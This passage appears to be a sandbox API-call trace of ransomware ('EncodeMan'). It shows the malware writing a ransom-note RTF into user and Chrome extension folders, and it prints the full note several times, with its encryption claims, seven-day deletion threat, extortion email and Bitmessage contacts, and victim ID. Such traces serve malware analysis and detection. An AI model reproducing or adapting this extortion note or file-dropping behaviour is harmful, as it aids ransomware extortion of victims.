l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\np¬WøÖ37\x1c\rx\x0b\x80¯5\x8c\x9cû)'\x9cý\x0e\x0f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0286.492] WriteFile (in: hFile=0x2f0, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.493] CloseHandle (hObject=0x2f0) returned 1 [0286.493] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\#readme_eman#.rtf")) returned 0x20 [0286.493] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0286.493] GetLastError () returned 0x2 [0286.493] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be 